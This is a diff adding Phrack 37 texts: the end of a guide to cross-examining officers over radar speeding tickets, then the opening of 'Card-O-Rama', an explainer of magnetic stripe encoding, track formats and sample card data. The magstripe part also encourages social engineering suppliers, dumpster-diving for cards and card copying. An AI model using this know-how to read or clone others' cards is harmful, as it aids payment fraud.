+  - If he even thinks about answering this question he is an idiot.  Neither
+    car will register.  (see question `H`)
+
+J. What kind of things will stop the beam?  Will underbrush stop the beam or
+   can you get a reading through tall grass, weeds, and bushes?
+
+  - Radar will go through these things.
+
+K. Are there circumstances under which you can obtain the speed of a vehicle
+   you cannot see?  For example, can you obtain the speed of a vehicle around
+   a corner or over a hill?
+
+  - Not in this world.
+
+L. Will your radar beam bounce off a metal surface such as a sign, a car,
+   a ,metal building, or a steal or concrete overpass?
+
+  - Sure will.
+
+M. What happens to the beam when it bounces off a metal object?  Could it pick
+   up the speed of a car at an angle to the direction you have the radar
+   pointed?
+
+  - Yes it will.
+
+N. Could a high power utility transmission line interfere with the radar unit?
+
+  - Yup.
+
+O. Could airport radar or military radar interfere with the radar?
+
+  - Sure can.
+
+P. Have you ever noticed interference from things like neon signs or street
+   lights?
+
+  - Such things do produce interference
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+FINAL QUESTIONS:  By now you have either made a enemy of the officer (most
+likely outcome) or started him thinking about the incident (if he is a good
+police officer).  The officer, of course, doesn't know what answers he got
+right and what ones he got wrong.  Watch for variations between answers, or
+especially, any weakening in his determination that yours was the car which
+registered on the radar unit.
+
+Questions `N`-`Q` taken together represent critical procedural questions.  It
+is important to differentiate between an internal calibration check (pushing a
+button) and an external check (holding a tuning fork to the antenna).
+
+A. Officer (such and such), let's go back over your recollection of the
+   incident one last time.  Can you relate the facts concerning the citation
+   as you remember them?
+
+B. Was your audio Doppler engaged at the time of the incident?  How loud or
+   soft was it?
+
+C. What speed was your audio alarm set for?  Had you moved it up or down
+   during your shift?
+
+D. Was your automatic speed lock engaged?
+
+E. Were you using a manual on-off switch?
+
+F. Were you in a stationary or moving mode at the time?
+
+G. Was the defendant coming or going away from you?
+
+H. Did you see other vehicles either in front of or behind the defendant?
+   Were they varied in size?  Were they varied in direction of travel?
+
+I. Was there traffic moving in the same direction as you? (if moving)
+
+J. Did you see the defendant prior to the time your audio alarm sounded?
+
+K. Were you able to obtain an approximate speed reading based on your
+   visual identification?  What was your point of reference?
+
+L. How many seconds elapsed between the time you first observed the defendant
+   and the time your audio alarm sounded?
+
+M. Were there any power lines in the area?  Cars or homes with CB antennas?
+   Buildings with two-way radio antennas?  Had you been talking on your radio?
+
+N. Regarding calibration of the radar unit, using the INTERNAL calibration
+   function, at what times before and after the citation did you check the
+   radar?
+
+O. Using an "external tuning fork", at what times before and after the citation
+   did you check your radar?
+
+P. In your estimation, what is the difference between the internal and external
+   calibration function?
+
+Q. Do you consider one of the calibration checks to be a more accurate
+   indicator of accuracy?  Which one?
+
+ ______________________________________________________________________________
+|                    |
+| Closing Arguments  |  If you have done well you will have established a great
+|____________________|  deal of doubt in the judges mind as to the capability
+                        of the officer in question to operate a radar unit.
+You have have set him/her thinking about the "big picture."  That is, "Just how
+accurate is traffic radars?"  This is what you want to achieve but it must be
+done in subtle way.
+
+You aren't out of the hole yet!  Now that you have established doubt in the
+judge's mind you MUST provide testimony that will TIE all the testimony the
+officer gave in with YOURS.  This is where you have to do the thinking on your
+own.  It should be very obvious how to do this.  Your job is to break down
+the testimony.  You are looking for 1) Procedural errors, 2) Lack of knowledge
+on the part of the officer, 3) Possible radars errors.  If you can get him
+on two of the three, you are set!
+
+Procedural errors include things like the previously mentioned incorrect
+citation.  Other procedural errors that are easy to play on is this.  The
+officer must use an external tuning that is certified as to it's accuracy in
+testing the radar unit immediately before he gives a citation.  Two court cases
+that are examples of this are WISCONSIN v. HANSEN and MINNESOTA v. GERDES.
+Simply put, if you are in need of throwing around some weight in court, just
+cite these two cases.  They are great!
+
+Ignorance on the part of the officer is pretty obvious.  If he messes up the
+questions, he is ignorant.  They are all pretty simple, I think.  If a cop does
+things like, uses his automatic speed lock or doesn't use his audio doppler, he
+is blatantly ignoring his training.  Most of the time they will bring a copy of
+their training manual to court.  Just point it out to them!
+
+There are too many potential radar errors to mention here.  You must try to
+locate them in the vicinity of where you encounter your ticket.  Anything that
+transmits on uncommon frequencies is great to note. (e.g. burglar alarms,
+garage doors, CB's, Ham Radio, rain, fog, police radio, hospitals, etc, etc.)
+
+In closing, I hope you found this information useful and look forward to the
+second part in my series, "Beating the Radar Rap: The Technical Side."  This
+will be a file where I go into picking apart the actual flaws that specific
+radar guns have.
+
diff --git a/phrack37/6.txt b/phrack37/6.txt
new file mode 100644
index 0000000..a814bbc
--- /dev/null
+++ b/phrack37/6.txt
@@ -0,0 +1,856 @@
+               Card-O-Rama: Magnetic Stripe Technology and Beyond
+                                       or
+                     "A Day in the Life of a Flux Reversal"
+
+                                   Written by
+
+                             oooOO Count Zero OOooo
+                         Restricted Data Transmissions
+
+                               November 22, 1992
+
+
+Look in your wallet.  Chances are you own at least 3 cards that have magnetic
+stripes on the back.  ATM cards, credit cards, calling cards, frequent flyer
+cards, ID cards, passcards,...cards, cards, cards!  And chances are you have NO
+idea what information is on those stripes or how they are encoded.  This
+detailed document will enlighten you and hopefully spark your interest in this
+fascinating field.  None of this info is "illegal"...but MANY organizations
+(the government, credit card companies, security firms, etc.) would rather keep
+you in the dark.  Also, many people will IMMEDIATELY  assume that you are a
+CRIMINAL if you merely "mention" that you are "interested in how magnetic
+stripe cards work."  Watch yourself, ok?  Just remember that there is nothing
+wrong with wanting to know how things work, although in our present society,
+you may be labelled a "deviant" (or worse, <gasp> a "hacker")!
+
+Anyway, I will explain in detail how magstripes are encoded and give several
+examples of the data found on some common cards.  I will also cover the
+technical theory behind magnetic encoding, and discuss magnetic encoding
+alternatives to magstripes (Wiegand, barium ferrite).  Non-magnetic card
+technology (bar code, infrared, etc.) will be described.  Finally, there will
+be an end discussion on security systems and the ramifications of emergent
+"smartcard" and biometric technologies.
+
+                                  *DISCLAIMER*
+
+Use this info to EXPLORE, not to EXPLOIT.  This text is presented for
+informational purposes only, and I cannot be held responsible for anything you
+do or any consequences thereof.  I do not condone fraud, larceny, or any other
+criminal activities. 
+
+                                  *A WARNING*
+
+Lately, I've noticed a few "books" and "magazines" for sale that were FILLED
+with FILES on a variety of computer topics.  These file were originally
+released into the Net with the intention of distributing them for FREE.
+HOWEVER, these files are now being PACKAGED and sold FOR PROFIT.  This really
+pisses me off.  I am writing this to be SHARED for FREE, and I ask no payment.
+Feel free to reprint this in hardcopy format and sell it if you must, but NO
+PROFITS must be made.  Not a fucking DIME!  If ANYONE reprints this file and
+tries to sell it FOR A PROFIT, I will hunt you down and make your life
+miserable.  How?  Use your imagination.  The reality will be worse.
+
+
+             **  MAGSTRIPE FIELDS, HEADS, ENCODING/READING **
+
+Now, I'll get down to business!
+
+First, I am going to explain the basics behind fields, heads, encoding and
+reading.  Try and absorb the THEORY behind encoding/reading.  This will help
+you greatly if you ever decide to build your own encoder/reader from scratch
+(more on that later).  FERROMAGNETIC materials are substances that retain
+magnetism after an external magnetizing field is removed.  This principle is
+the basis of ALL magnetic recording and playback.  Magnetic POLES always occur
+in pairs within magnetized material, and MAGNETIC FLUX lines emerge from the
+NORTH pole and terminate at the SOUTH.  The elemental parts of MAGSTRIPES are
+ferromagnetic particles about 20 millionths of an inch long, each of which acts
+like a tiny bar magnet.  These particles are rigidly held together by a resin
+binder.  The magnetic particles are made by companies which make coloring
+pigments for the paint industry, and are usually called pigments.  When making
+the magstripe media, the elemental magnetic particles are aligned with their
+North-South axes parallel to the magnetic stripe by means of an external
+magnetic fields while the binder hardens.
+
+These particles are actually permanent bar magnets with TWO STABLE POLARITIES.
+If a magnetic particle is placed in a strong external magnetic field of the
+opposite polarity, it will FLIP its own polarity (North becomes South, South
+becomes North).  The external magnetic field strength required to produce this
+flip is called the COERCIVE FORCE, or COERCIVITY of the particle.  Magnetic
+pigments are available in a variety of coercivities (more on that later on).
+
+An unencoded magstripe is actually a series of North-South magnetic domains
+(see Figure 1).  The adjacent N-S fluxes merge, and the entire stripe acts as a
+single bar magnet with North and South poles at its ends.
+
+Figure 1:               N-S.N-S.N-S.N-S.N-S.N-S.N-S.N-S <-particles in stripe
+---------
+       represented as-> N-----------------------------S
+
+
+However, if a S-S interface is created somewhere on the stripe, the fluxes will
+REPEL, and we get a concentration of flux lines around the S-S interface (same
+with N-N interface).  ENCODING consists of creating S-S and N-N interfaces, and
+READING consists of (you guessed it) detecting 'em.  The S-S and N-N interfaces
+are called FLUX REVERSALS.
+
+                            ||| ||| <-flux lines
+Figure 2:      N------------N-N-S-S-----------------S
+---------     flux lines -> ||| |||
+
+
+The external magnetic field used to flip the polarities is produced by a
+SOLENOID, which can REVERSE its polarity by reversing the direction of CURRENT.
+An ENCODING head solenoid looks like a bar magnet bent into the shape of a ring
+so that the North/South poles are very close and face each other across a tiny
+gap.  The field of the solenoid is concentrated across this gap, and when
+elemental magnetic particles of the magstripe are exposed to this field, they
+polarize to the OPPOSITE (unlike poles attract).  Movement of the stripe past
+the solenoid gap during which the polarity of the solenoid is REVERSED will
+produce a SINGLE flux reversal (see Figure 3).  To erase a magstripe, the
+encoding head is held at a CONSTANT polarity and the ENTIRE stripe is moved
+past it.  No flux reversals, no data. 
+
+                              | |  <----wires leading to solenoid      
+                              | |       (wrapped around ring)
+                            /-|-|-\
+                           /       \
+Figure 3:                  |       | <----solenoid (has JUST changed polarity)                           
+---------                  \       /
+                            \ N S / <---gap in ring.. NS polarity across gap
+      N----------------------SS-N-------------------------S
+                             ^^  
+                   <<<<<-direction of stripe movement
+
+          S-S flux reversal created at trailing edge of solenoid!
+
+
+So, we now know that flux reversals are only created the INSTANT the solenoid
+CHANGES its POLARITY.  If the solenoid in Figure 3 were to remain at its
+current polarity, no further flux reversals would be created as the magstripe
+moves from right to left.  But, if we were to change the solenoid gap polarity
+>from NS to *SN*, then (you guessed it) a *N-N* flux reversal would instantly be
+created.  Just remember, for each and every reversal in solenoid polarity, a
+single flux reversal is created (commit it to memory).  An encoded magstripe is
+therefore just a series of flux reversals (NN followed by SS followed by NN).
+
+DATA! DATA! DATA!  That's what you want!  How the hell are flux reversals read
+and interpreted as data?  Another solenoid called a READ HEAD is used to detect
+these flux reversals.  The read head operates on the principle of
+ELECTROMAGNETIC RECIPROCITY: current passing thru a solenoid produces a
+magnetic field at the gap, therefore, the presence of a magnetic field at the
+gap of a solenoid coil will *produce a current in the coil*!  The strongest
+magnetic fields on a magstripe are at the points of flux reversals.  These are
+detected as voltage peaks by the reader, with +/- voltages corresponding to
+NN/SS flux reversals (remember, flux reversals come in 2 flavors).
+
+See Figure 4.
+
+              magstripe---> -------NN--------SS--------NN---------SS------
+           
+Figure 4:     voltage-----> .......+.........-.........+...........-.....
+---------
+                                   ----------          -------------
+            peak readout-->        |        |          |           |
+                           --------|        |----------|           |----
+
+
+The "peak readout" square waveform is critical.  Notice that the voltage peak
+remains the same until a new flux reversal is encountered.
+
+Now, how can we encode DATA?  The most common technique used is known as
+Aiken Biphase, or "two-frequency coherent-phase encoding" (sounds impressive,
+eh?).  First, digest the diagrams in Figure 5.
+
+Figure 5:       ----------        ----------        ----------
+---------       |        |        |        |        |        |  <- peak
+         a)     |        |--------|        |--------|        |     readouts
+                *   0    *   0    *   0    *   0    *   0    *
+
+
+                -----    -----    -----    -----    -----    -
+                |   |    |   |    |   |    |   |    |   |    |
+        b)      |   |----|   |----|   |----|   |----|   |----|
+
+                *   1    *   1    *   1    *   1    *   1    *
+
+                -----    ----------        -----    -----    -
+                |   |    |        |        |   |    |   |    |
+        c)      |   |----|        |--------|   |----|   |----|
+
+                *   1    *   0    *   0    *   1    *   1    *
+
+
+There you have it.  Data is encoded in "bit cells," the frequency of which is
+the frequency of '0' signals.  '1' signals are exactly TWICE the frequency of
+'0' signals.  Therefore, while the actual frequency of the data passing the
+read head will vary due to swipe speed, data density, etc, the '1' frequency
+will ALWAYS be TWICE the '0' frequency.  Figure 5C shows exactly how '1' and
+'0' data exists side by side.
+
+We're getting closer to read DATA!  Now, we're all familiar with binary and how
+numbers and letters can be represented in binary fashion very easily.  There
+are obviously an *infinite* number of possible standards, but thankfully the
+American National Standards Institute (ANSI) and the International Standards
+Organization (ISO) have chosen 2 standards.  The first is
+
+
+                         ** ANSI/ISO BCD Data format **
+
+This is a 5-bit Binary Coded Decimal format.  It uses a 16-character set, which
+uses 4 of the 5 available bits.  The 5th bit is an ODD parity bit, which means
+there must be an odd number of 1's in the 5-bit character..the parity bit will
+"force" the total to be odd.  Also, the Least Significant Bits are read FIRST
+on the strip.  See Figure 6.
+
+The sum of the 1's in each case is odd, thanks to the parity bit.  If the read
+system adds up the 5 bits and gets an EVEN number, it flags the read as ERROR,
+and you got to scan the card again (I *know* a lot of you out there *already*
+understand parity, but I got to cover all the bases...not everyone sleeps with
+their modem and can recite the entire AT command set at will, you know).  See
+Figure 6 for details of ANSI/ISO BCD.
+
+Figure 6:        ANSI/ISO BCD Data Format
+---------
+
+ * Remember that b1 (bit #1) is the LSB (least significant bit)!
+  * The LSB is read FIRST!
+  * Hexadecimal conversions of the Data Bits are given in parenthesis (xH).
+
+        --Data Bits--   Parity
+        b1  b2  b3  b4   b5    Character  Function
+
+        0   0   0   0    1        0 (0H)    Data
+        1   0   0   0    0        1 (1H)      "
+        0   1   0   0    0        2 (2H)      "
+        1   1   0   0    1        3 (3H)      "
+        0   0   1   0    0        4 (4H)      "
+        1   0   1   0    1        5 (5H)      "
+        0   1   1   0    1        6 (6H)      "
+        1   1   1   0    0        7 (7H)      "
+        0   0   0   1    0        8 (8H)      "
+        1   0   0   1    1        9 (9H)      "
+        0   1   0   1    1        : (AH)    Control
+        1   1   0   1    0        ; (BH)    Start Sentinel
+        0   0   1   1    1        < (CH)    Control
+        1   0   1   1    0        = (DH)    Field Separator
+        0   1   1   1    0        > (EH)    Control
+        1   1   1   1    1        ? (FH)    End Sentinel
+
+
+           ***** 16 Character 5-bit Set *****
+                10 Numeric Data Characters
+                3 Framing/Field Characters
+                3 Control Characters
+
+
+The magstripe begins with a string of Zero bit-cells to permit the self-
+clocking feature of biphase to "sync" and begin decoding.  A "Start Sentinel"
+character then tells the reformatting process where to start grouping the
+decoded bitstream into groups of 5 bits each.  At the end of the data, an "End
+Sentinel" is encountered, which is followed by an "Longitudinal Redundancy
+Check (LRC) character.  The LRC is a parity check for the sums of all b1, b2,
+b3, and b4 data bits of all preceding characters.  The LRC character will catch
+the remote error that could occur if an individual character had two
+compensating errors in its bit pattern (which would fool the 5th-bit parity
+check).
+
+The START SENTINEL, END SENTINEL, and LRC are collectively called "Framing
+Characters", and are discarded at the end of the reformatting process.
+
+
+                        ** ANSI/ISO ALPHA Data Format **
+
+Alphanumeric data can also be encoded on magstripes.  The second ANSI/ISO data
+format is ALPHA (alphanumeric) and involves a 7-bit character set with 64
+characters.  As before, an odd parity bit is added to the required 6 data bits
+for each of the 64 characters.  See Figure 7.
+
+Figure 7:
+---------             ANSI/ISO ALPHA Data Format
+
+   * Remember that b1 (bit #1) is the LSB (least significant bit)!  
+   * The LSB is read FIRST!
+   * Hexadecimal conversions of the Data Bits are given in parenthesis (xH).
+
+
+         ------Data Bits-------   Parity
+         b1  b2  b3  b4  b5  b6     b7    Character   Function
+
+          0   0   0   0   0   0     1      space (0H) Special
+          1   0   0   0   0   0     0        ! (1H)      "
+          0   1   0   0   0   0     0        " (2H)      "
+          1   1   0   0   0   0     1        # (3H)      "
+          0   0   1   0   0   0     0        $ (4H)      "
+          1   0   1   0   0   0     1        % (5H)   Start Sentinel
+          0   1   1   0   0   0     1        & (6H)   Special
+          1   1   1   0   0   0     0        ' (7H)      "
+          0   0   0   1   0   0     0        ( (8H)      "
+          1   0   0   1   0   0     1        ) (9H)      "
+          0   1   0   1   0   0     1        * (AH)      "
+          1   1   0   1   0   0     0        + (BH)      "
+          0   0   1   1   0   0     1        , (CH)      "
+          1   0   1   1   0   0     0        - (DH)      "
+          0   1   1   1   0   0     0        . (EH)      "
+          1   1   1   1   0   0     1        / (FH)      "
+
+          0   0   0   0   1   0     0        0 (10H)    Data (numeric)
+          1   0   0   0   1   0     1        1 (11H)     "
+          0   1   0   0   1   0     1        2 (12H)     "
+          1   1   0   0   1   0     0        3 (13H)     "
+          0   0   1   0   1   0     1        4 (14H)     "
+          1   0   1   0   1   0     0        5 (15H)     "
+          0   1   1   0   1   0     0        6 (16H)     "
+          1   1   1   0   1   0     1        7 (17H)     "
+          0   0   0   1   1   0     1        8 (18H)     "
+          1   0   0   1   1   0     0        9 (19H)     "
+
+          0   1   0   1   1   0     0        : (1AH)   Special
+          1   1   0   1   1   0     1        ; (1BH)      "
+          0   0   1   1   1   0     0        < (1CH)      "
+          1   0   1   1   1   0     1        = (1DH)      "
+          0   1   1   1   1   0     1        > (1EH)      "
+          1   1   1   1   1   0     0        ? (1FH)   End Sentinel
+          0   0   0   0   0   1     0        @ (20H)   Special
+
+          1   0   0   0   0   1     1        A (21H)   Data (alpha) 
+          0   1   0   0   0   1     1        B (22H)     "
+          1   1   0   0   0   1     0        C (23H)     "
+          0   0   1   0   0   1     1        D (24H)     "
+          1   0   1   0   0   1     0        E (25H)     "
+          0   1   1   0   0   1     0        F (26H)     "
+          1   1   1   0   0   1     1        G (27H)     "
+          0   0   0   1   0   1     1        H (28H)     "
+          1   0   0   1   0   1     0        I (29H)     "
+          0   1   0   1   0   1     0        J (2AH)     "
+          1   1   0   1   0   1     1        K (2BH)     "
+          0   0   1   1   0   1     0        L (2CH)     "
+          1   0   1   1   0   1     1        M (2DH)     "
+          0   1   1   1   0   1     1        N (2EH)     "
+          1   1   1   1   0   1     0        O (2FH)     "
+          0   0   0   0   1   1     1        P (30H)     "
+          1   0   0   0   1   1     0        Q (31H)     "
+          0   1   0   0   1   1     0        R (32H)     "
+          1   1   0   0   1   1     1        S (33H)     "
+          0   0   1   0   1   1     0        T (34H)     "
+          1   0   1   0   1   1     1        U (35H)     "
+          0   1   1   0   1   1     1        V (36H)     "
+          1   1   1   0   1   1     0        W (37H)     "
+          0   0   0   1   1   1     0        X (38H)     "
+          1   0   0   1   1   1     1        Y (39H)     "
+          0   1   0   1   1   1     1        Z (3AH)     "
+
+          1   1   0   1   1   1     0        [ (3BH)    Special
+          0   0   1   1   1   1     1        \ (3DH)    Special
+          1   0   1   1   1   1     0        ] (3EH)    Special
+          0   1   1   1   1   1     0        ^ (3FH)    Field Separator
+          1   1   1   1   1   1     1        _ (40H)    Special
+
+              ***** 64 Character 7-bit Set *****
+                  * 43 Alphanumeric Data Characters
+                  * 3 Framing/Field Characters
+                  * 18 Control/Special Characters
+
+
+The two ANSI/ISO formats, ALPHA and BCD, allow a great variety of data to be
+stored on magstripes.  Most cards with magstripes use these formats, but
+occasionally some do not.  More about those later on.
+
+
+                      ** Tracks and Encoding Protocols **
+
+Now we know how the data is stored.  But WHERE is the data stored on the
+magstripe?  ANSI/ISO standards define *3* Tracks, each of which is used for
+different purposes.  These Tracks are defined only by their location on the
+magstripe, since the magstripe as a whole is magnetically homogeneous.  See
+Figure 8.
+
+Figure 8:
+---------          <edge of card>
+         _________________________________________________________________
+         |                  ^         ^         ^
+         |------------------| 0.223"--|---------|-------------------------
+         |                  |         | 0.353"  |            ^
+         |..................|.........|.........| 0.493"     |
+         | Track #1  0.110"           |         |            |
+         |............................|.........|...     <MAGSTRIPE>
+         |                            |         |            |
+         |............................|.........|...         |
+         | Track #2  0.110"                     |            |
+         |......................................|...         |
+         |                                      |            |
+         |......................................|...         |
+         | Track #3  0.110"                                  |
+         |..........................................         |
+         |                                                   |
+         |------------------------------------------------------------------
+         |
+         |                   <body of card>
+         |
+
+
+You can see the exact distances of each track from the edge of the card, as
+well as the uniform width and spacing.  Place a magstripe card in front of you
+with the magstripe visible at the bottom of the card.  Data is encoded from
+left to right (just like reading a book).  See Figure 9.
+
+
+Figure 9:
+---------          ANSI/ISO Track 1,2,3 Standards
+
+     Track     Name     Density     Format    Characters     Function
+   --------------------------------------------------------------------
+       1       IATA     210 bpi     ALPHA        79        Read Name & Account
+       2       ABA       75 bpi      BCD         40        Read Account
+       3       THRIFT   210 bpi      BCD        107        Read Account &
+                                                           *Encode* Transaction
+
+
+   *** Track 1 Layout: ***     
+
+             | SS | FC |  PAN  |   Name   | FS |  Additional Data | ES | LRC |
+
+ SS=Start Sentinel "%"
+ FC=Format Code
+ PAN=Primary Acct. # (19 digits max)
+ FS=Field Separator "^"
+ Name=26 alphanumeric characters max.
+ Additional Data=Expiration Date, offset, encrypted PIN, etc.
+ ES=End Sentinel "?"
+ LRC=Longitudinal Redundancy Check
+
+
+   *** Track 2 Layout: ***
+
+           | SS |  PAN  | FS |  Additional Data  | ES | LRC |
+
+ SS=Start Sentinel ";"
+ PAN=Primary Acct. # (19 digits max)
+ FS=Field Separator "="
+ Additional Data=Expiration Date, offset, encrypted PIN, etc.
+ ES=End Sentinel "?"
+ LRC=Longitudinal Redundancy Check 
+
+
+   *** Track 3 Layout: **  Similar to tracks 1 and 2.  Almost never used.
+                           Many different data standards used.
+
+
+   Track 2, "American Banking Association," (ABA) is most commonly used.  This
+is the track that is read by ATMs and credit card checkers.  The ABA designed
+the specifications of this track and all world banks must abide by it.  It
+contains the cardholder's account, encrypted PIN, plus other discretionary
+data.
+
+Track 1, named after the "International Air Transport Association," contains
+the cardholder's name as well as account and other discretionary data.  This
+track is sometimes used by the airlines when securing reservations with a
+credit card; your name just "pops up" on their machine when they swipe your
+card!
+
+Since Track 1 can store MUCH more information, credit card companies are trying
+to urge retailers to buy card readers that read Track 1.  The *problem* is that
+most card readers read either Track 1 or Track 2, but NOT BOTH!  And the
+installed base of readers currently is biased towards Track 2.  VISA USA is at
+the front of this 'exodus' to Track 1, to the point where they are offering
+Track 1 readers at reduced prices thru participating banks.  A spokesperson for
+VISA commented:
+
+     "We think that Track 1 represents more flexibility and the potential
+     to deliver more information, and we intend to build new services
+     around the increased information."
+
+What new services?  We can only wait and see.
+
+Track 3 is unique.  It was intended to have data read and WRITTEN on it.
+Cardholders would have account information UPDATED right on the magstripe.
+Unfortunately, Track 3 is pretty much an orphaned standard.  Its *original*
+design was to control off-line ATM transactions, but since ATMs are now on-line
+ALL THE TIME, it's pretty much useless.  Plus the fact that retailers and banks
+would have to install NEW card readers to read that track, and that costs $$.
+
+Encoding protocol specifies that each track must begin and end with a length
+of all Zero bits, called CLOCKING BITS.  These are used to synch the self-
+clocking feature of biphase decoding.  See Figure 10.
+
+Figure 10:                              end sentinel
+                     start sentinel      |  longitudinal redundancy check
+                      |                  |  |
+      000000000000000 SS.................ES LRC 0000000000000000
+       leading           data, data, data           trailing
+       clocking bits                                clocking bits
+       (length varies)                             (length varies)
+
+THAT'S IT!!!  There you have the ANSI/ISO STANDARDS!  Completely explained.
+Now, the bad news.  NOT EVERY CARD USES IT!  Credit cards and ATM cards will
+follow these standards.  BUT, there are many other types of cards out there.
+Security passes, copy machine cards, ID badges, and EACH of them may use a
+PROPRIETARY density/format/track-location system.  ANSI/ISO is REQUIRED for
+financial transaction cards used in the international interbank network.  All
+other cards can play their own game.
+
+The good news.  MOST other cards follow the standards, because it's EASY to
+follow a standard instead of WORKING to make your OWN!  Most magstripe cards
+other than credit cards and ATM cards will use the same Track specifications,
+and use either BCD or ALPHA formats. 
+
+
+                     ** A Bit About Magstripe Equipment **
+
+"Wow, now I know how to interpret all that data on magstripes!  But.waitasec,
+what kind of equipment do I need to read the stripes?  Where can I buy a
+reader?  I don't see any in Radio Shack!!"
+
+Sorry, but magstripe equipment is hard to come by.  For obvious reasons, card
+readers are not made commonly available to consumers.  How to build one is the
+topic for another file (this file is already too long).
+
+Your best bets are to try and scope out Electronics Surplus Stores and flea
+markets.  Do not even bother trying to buy one directly from a manufacturer,
+since they will immediately assume you have "criminal motives."  And as for
+getting your hands on a magstripe ENCODER...well, good luck!  Those rare
+beauties are worth their weight in gold.  Keep your eyes open and look around,
+and MAYBE you'll get lucky!  A bit of social engineering can go a LONG way.
+
+There are different kinds of magstripe readers/encoders.  The most common ones
+are "swipe" machines: the type you have to physically slide the card thru.
+Others are "insertion" machines: like ATM machines they 'eat' your card, then
+regurgitate it after the transaction.  Costs are in the thousands of dollars,
+but like I said, flea markets and surplus stores will often have GREAT deals
+on these things.  Another problem is documentation for these machines.  If you
+call the manufacturer and simply ask for 'em, they will probably deny you the
+literature.  "Hey son, what are you doing with our model XYZ swipe reader?
+That belongs in the hands of a "qualified" merchant or retailer, not some punk
+kid trying to "find out how things work!"  Again, some social engineering may
+be required.  Tell 'em you're setting up a new business.  Tell 'em you're
+working on a science project.  Tell 'em anything that works!
+
+2600 Magazine recently had a good article on how to build a machine that copies
+magstripe cards.  Not much info on the actual data formats and encoding
+schemes, but the device described is a start.  With some modifications, I bet
+you could route the output to a dumb terminal (or thru a null modem cable) in
+order to READ the data.  Worth checking out the schematics.
+
+As for making your own cards, just paste a length of VCR, reel-to-reel, or
+audio cassette tape to a cut-out posterboard or plastic card.  Works just as
+good as the real thing, and useful to experiment with if you have no expired or
+'dead' ATM or calling cards lying around (SAVE them, don't TOSS them!).
+
+
+                      ** Examples of Data on Magstripes **
+
+The real fun in experimenting with magstripe technology is READING cards to
+find out WHAT THE HELL is ON them!  Haven't you wondered?  The following cards
+are the result of my own 'research'.  Data such as specific account numbers and
+names has been changed to protect the innocent.  None the cards used to make
+this list were stolen or acquired illegally.
+
+Notice that I make careful note of "common data." This is data that I noticed
+was the same for all cards of a particular type.  This is highlighted below the
+data with asterisks (*).  Where I found varying data, I indicate it with "x"'s.
+In those cases, NUMBER of CHARACTERS was consistent (the number of "x"'s equals
+the number of characters...one to one relationship).
+
+I still don't know what some of the data fields are for, but hopefully I will
+be following this file with a sequel after I collect more data.  It ISN'T easy
+to find lots of cards to examine. Ask your friends, family, and co-workers to
+help!  "Hey, can I, ahh, like BORROW your MCI calling card tonight?  I'm
+working on an, ahh, EXPERIMENT.  Please?"  Just...be honest!  Also, do some
+trashing.  People will often BEND expired cards in half, then throw them out.
+Simply bend them back into their normal shape, and they'll usually work (I've
+done it!).  They may be expired, but they're not ERASED!  
+-------------------------------------------------------------------------------
+-=Mastercard=-  Number on front of card -> 1111 2222 3333 4444
+                Expiration date -> 12/99 
+
+Track 2 (BCD,75 bpi)-> ;1111222233334444=99121010000000000000?
+                                             ***
+          
+Track 1 (ALPHA,210 bpi)-> %B1111222233334444^PUBLIC/JOHN?
+                           *
+Note that the "101" was common to all MC cards checked, as well as the "B".
+-------------------------------------------------------------------------------
+-=VISA=-  Number on front of card -> 1111 2222 3333 4444
+          Expiration date -> 12/99
+
+Track 2 (BCD,75 bpi)-> ;1111222233334444=9912101xxxxxxxxxxxxx?
+                                             ***
+Track 1 (ALPHA,210 bpi)-> %B1111222233334444^PUBLIC/JOHN^9912101xxxxxxxxxxxxx?
+                           *
+
+Note that the "101" was common to all VISA cards checked, as well as the "B".
+Also, the "xxx" indicates numeric data that varied from card to card, with no
+apparent pattern.  I believe this is the encrypted pin for use when cardholders
+get 'cash advances' from ATMs.  In every case, tho, I found *13* digits of the
+stuff.
+-------------------------------------------------------------------------------
+-=Discover=-  Number on front of card -> 1111 2222 3333 4444
+              Expiration date -> 12/99
+
+Track 2 (BCD,75 bpi)-> ;1111222233334444=991210100000?
+                                             ********
+
+Track 1 (ALPHA,210 bpi)-> %B1111222233334444^PUBLIC/JOHN___^991210100000?
+                                                                ******** 
+Note, the "10100000" and "B" were common to most DISCOVER cards checked.  I
+found a few that had "10110000" instead.  Don't know the significance.  Note
+the underscores after the name JOHN.  I found consistently that the name data
+field had *26* characters.  Whatever was left of the field after the name was
+"padded" with SPACES.  So...for all of you with names longer than 25 (exclude
+the "/") characters, PREPARE to be TRUNCATED! ;)
+-------------------------------------------------------------------------------
+-=US Sprint FON=-  Number on front of card -> 111 222 3333 4444
+
+Track 2 (BCD,75 bpi)-> ;xxxxxx11122233339==xxx4444xxxxxxxxxx=?
+                                        *
+
+Track 1 (ALPHA,210 bpi)-> %B^ /^^xxxxxxxxxxxxxxxxx?
+                           *
+
+Strange.  None of the cards I check had names in the Track 1 fields.  Track 1
+looks unused, yet it was always formatted with field separators.  The "xxx"
+stuff varied from card to card, and I didn't see a pattern.  I know it isn't
+a PIN, so it must be account data.
+-------------------------------------------------------------------------------
+-=Fleet Bank=-  Number on front of card -> 111111 222 3333333
+                Expiration date -> 12/99
+
+Track 2 (BCD,75 bpi)-> ;1111112223333333=9912120100000000xxxx?
+                                             ****        
+
+Track 1 (ALPHA,210 bpi) ->
+         %B1111112223333333^PUBLIC/JOHN___^9912120100000000000000xxxx000000?
+          *                                    ****
+
+Note that the "xxx" data varied.  This is the encrypted PIN offset.  Always 4
+digits (hmmm...).  The "1201" was always the same.  In fact, I tried many ATM
+cards from DIFFERENT BANKS...and they all had "1201".  
+-------------------------------------------------------------------------------
+(Can't leave *this* one out ;)
+-=Radio Shack=-  Number on front of card -> 1111 222 333333
+                 NO EXPIRATION data on card
+
+Track 2 (BCD,75 dpi)-> ;1111222333333=9912101?
+                                      *******
+
+Note that the "9912101" was the SAME for EVERY Radio Shack card I saw.  Looks
+like when they don't have 'real' data to put in the expiration date field, they
+have to stick SOMETHING in there.
+-------------------------------------------------------------------------------
+
+Well, that's all I'm going to put out right now.  As you can see, the major
+types of cards (ATMs, CC) all follow the same rules more or less.  I checked
+out a number of security passcards and timeclock entry cards..and they ALL had
+random stuff written to Track 2.  Track 2 is by FAR the MOST utilized track on
+the card.  And the format is pretty much always ANSI/ISO BCD.  I *did* run into
+some hotel room access cards that, when scanned, were GARBLED.  They most
+likely used a character set other than ASCII (if they were audio tones, my
+reader would have put out NOTHING...as opposed to GARBLED data).  As you can
+see, one could write a BOOK listing different types of card data.  I intended
+only to give you some examples.  My research has been limited, but I tried to
+make logical conclusions based on the data I received. 
+
+
+                           ** Cards of All Flavors **
+
